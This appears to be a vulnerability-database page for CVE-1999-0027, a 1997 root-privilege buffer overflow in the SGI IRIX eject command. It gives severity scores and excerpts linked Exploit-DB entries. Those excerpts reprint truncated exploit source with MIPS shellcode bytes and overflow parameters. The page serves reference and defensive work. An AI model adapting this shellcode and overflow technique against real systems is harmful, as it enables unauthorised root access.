CVE-1999-0027
published 1997-07-16CVE-1999-0027: root privileges via buffer overflow in eject command on SGI IRIX systems.
PriorityP425high7.2CVSS 2.0
AVLACLAuNCCICAC
EXPLOIT
EPSS
1.17%
63.4th percentile
root privileges via buffer overflow in eject command on SGI IRIX systems.
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
SGI IRIX 6.2 - 'eject' Local Privilege Escalation (1)
exploitdb·1997-05-25
CVE-1999-0027 SGI IRIX 6.2 - 'eject' Local Privilege Escalation (1)
SGI IRIX 6.2 - 'eject' Local Privilege Escalation (1)
---
// source: https://www.securityfocus.com/bid/351/info
A vulnerability exists in the eject program shipped with Irix 6.2 from Silicon Graphics. By supplying a long argument to the eject program, it is possible to overwrite the return address on the stack, and execute arbitrary code as root. Eject is normally used to eject removeable media from the system, and as such is setuid root to allow for any user at the console to perform eject operations.
/* /usr/sbin/eject exploit by DCRH 25/5/97
*
* Tested on: R8000 Power Challenge (Irix64 6.2)
*
* Exploit doesn't work on Irix 5.x due to stack position
* Irix 6.3 does not appear to be vulnerable
*
* compile as: cc -n32 eject.c
*/
#include
#include
#include
#include
#include
#define NU
Exploit-DB
SGI IRIX - 'LsD' Multiple Local Buffer Overflows
exploitdb·1997-05-25
CVE-1999-0027 SGI IRIX - 'LsD' Multiple Local Buffer Overflows
SGI IRIX - 'LsD' Multiple Local Buffer Overflows
---
/* copyright by */
/* Last Stage of Delirium, Dec 1996, Poland*/
#include
#include
#include
#define BUFSIZE 2068
#define OFFS 800
#define ADDRS 3
#define ALIGN 0
#define ALIGN2 4
char asmcode[]="\x3c\x18\x2f\x62\x37\x18\x69\x6e\x3c\x19\x2f\x73\x37\x39\x68\x2e\xaf\xb8\xff\xf8\xaf\xb9\xff\xfc\xa3\xa0\xff\xff\x27\xa4\xff\xf8\x27\xa5\xff\xf0\x01\x60\x30\x24\xaf\xa4\xff\xf0\xaf\xa0\xff\xf4\x24\x02\x04\x23\x02\x04\x8d\x0c";
char nop[]="\x24\x0f\x12\x34";
void run(unsigned char *buf) {
execl("/usr/sbin/eject","lsd",buf,NULL);
printf("execl failed\n");
}
char jump[]="\x03\xa0\x10\x25\x03\xe0\x00\x08\x24\x0f\x12\x34\x24\x0f\x12\x34";
main(int argc, char *argv[]) {
char *buf, *ptr, addr[8];
int offs=OFFS, bufsize=BUFSIZE, addrs=ADDRS, alig
Exploit-DB
SGI IRIX 6.2 - 'eject' Local Privilege Escalation (2)
exploitdb·1997-05-25
CVE-1999-0027 SGI IRIX 6.2 - 'eject' Local Privilege Escalation (2)
SGI IRIX 6.2 - 'eject' Local Privilege Escalation (2)
---
// source: https://www.securityfocus.com/bid/351/info
A vulnerability exists in the eject program shipped with Irix 6.2 from Silicon Graphics. By supplying a long argument to the eject program, it is possible to overwrite the return address on the stack, and execute arbitrary code as root. Eject is normally used to eject removeable media from the system, and as such is setuid root to allow for any user at the console to perform eject operations.
/* copyright by */
/* Last Stage of Delirium, Dec 1996, Poland*/
#include
#include
#include
#define BUFSIZE 2068
#define OFFS 800
#define ADDRS 3
#define ALIGN 0
#define ALIGN2 4
char asmcode[]="\x3c\x18\x2f\x62\x37\x18\x69\x6e\x3c\x19\x2f\x73\x37\x39\x68\x2e\xaf\xb8\xff\xf8\xaf\xb9\x
No writeups or analysis indexed.
1997-07-16
Published